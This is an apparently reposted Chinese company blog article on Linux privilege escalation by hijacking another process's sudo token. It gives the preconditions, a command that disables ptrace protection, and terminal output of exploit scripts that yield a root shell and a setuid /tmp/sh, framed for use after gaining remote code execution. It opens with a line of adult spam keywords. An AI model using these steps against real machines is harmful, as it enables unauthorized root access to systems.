欧美一区二区三区老妇人-欧美做爰猛烈大尺度电-99久久夜色精品国产亚洲a-亚洲福利视频一区二区

linux中如何利用sudotoken實(shí)現(xiàn)提權(quán)

小編給大家分享一下linux中如何利用sudo token實(shí)現(xiàn)提權(quán),希望大家閱讀完這篇文章之后都有所收獲,下面讓我們一起去探討吧!

“專業(yè)、務(wù)實(shí)、高效、創(chuàng)新、把客戶的事當(dāng)成自己的事”是我們每一個(gè)人一直以來堅(jiān)持追求的企業(yè)文化。 創(chuàng)新互聯(lián)建站是您可以信賴的網(wǎng)站建設(shè)服務(wù)商、專業(yè)的互聯(lián)網(wǎng)服務(wù)提供商! 專注于做網(wǎng)站、成都網(wǎng)站設(shè)計(jì)、軟件開發(fā)、設(shè)計(jì)服務(wù)業(yè)務(wù)。我們始終堅(jiān)持以客戶需求為導(dǎo)向,結(jié)合用戶體驗(yàn)與視覺傳達(dá),提供有針對性的項(xiàng)目解決方案,提供專業(yè)性的建議,創(chuàng)新互聯(lián)建站將不斷地超越自我,追逐市場,引領(lǐng)市場!

如何利用系統(tǒng)中的漏洞?

$sudo whatever
[sudo]password for user:    # Press<ctrl>+c since you don't have the password. # This creates an invalidsudo tokens.
$ sh exploit.sh
....wait 1 seconds
$sudo -i # no password required :)
# id
uid=0(root)gid=0(root) groups=0(root)

實(shí)現(xiàn)要求

1、 完全啟用Ptrace(/proc/sys/kernel/yama/ptrace_scope == 0);

2、 當(dāng)前用戶必須開啟一個(gè)擁有有效sudo令牌并且相同uid的活動(dòng)進(jìn)程;

注:默認(rèn)密碼的超時(shí)時(shí)間為15分鐘,如果你在15分鐘內(nèi)使用sudo兩次,系統(tǒng)就不會要求你再輸入用戶的sudo密碼了。

工作機(jī)制

項(xiàng)目目錄中的Exploit.sh會向當(dāng)前用戶的所有進(jìn)程注入Shell代碼,并使用它們的sudo令牌來驗(yàn)證我們自己的sudo口令。僅需三行Shell代碼,一切皆有可能。

使用樣例

假設(shè),你拿到了一個(gè)RCE,而且沒有用戶密碼,但目標(biāo)用戶使用了sudo,那么你就可以通過竊取他的sudo令牌來實(shí)現(xiàn)提權(quán)啦!

如何在實(shí)驗(yàn)環(huán)境中模擬?

#echo 0 > /proc/sys/kernel/yama/ptrace_scope
# #Don't worry this is not persistent accross reboot

打開兩個(gè)終端窗口:

1、 其中一個(gè)執(zhí)行sudo命令,然后輸入正確的用戶密(sudo ls);

2、 另一個(gè)按照上述方法執(zhí)行漏洞利用代碼;

使用exploit_v2.sh在/tmp/sh中創(chuàng)建一個(gè)suid sh

如果exploit_v1無法成功的話,大家可以嘗試一下exploit_v2.sh:

$./exploit_v2.sh
Currentprocess : 2441
chmod:changing permissions of 'activate_sudo_token': Operation not permitted
Injectingprocess 1721 -> bash
Injectingprocess 2433 -> bash
cat:/proc/2446/comm: No such file or directory
Injectingprocess 2446 ->
$/tmp/sh -p
# id
uid=1001(test)gid=1001(test) euid=0(root) egid=0(root) groups=0(root),1001(test)

看完了這篇文章,相信你對“l(fā)inux中如何利用sudo token實(shí)現(xiàn)提權(quán)”有了一定的了解,如果想了解更多相關(guān)知識,歡迎關(guān)注創(chuàng)新互聯(lián)行業(yè)資訊頻道,感謝各位的閱讀!

新聞名稱:linux中如何利用sudotoken實(shí)現(xiàn)提權(quán)
網(wǎng)站地址:http://www.chinadenli.net/article32/joigsc.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián),為您提供網(wǎng)站維護(hù)Google定制網(wǎng)站網(wǎng)站制作營銷型網(wǎng)站建設(shè)自適應(yīng)網(wǎng)站

廣告

聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主,如果涉及侵權(quán)請盡快告知,我們將會在第一時(shí)間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場,如需處理請聯(lián)系客服。電話:028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載,或轉(zhuǎn)載時(shí)需注明來源: 創(chuàng)新互聯(lián)

外貿(mào)網(wǎng)站建設(shè)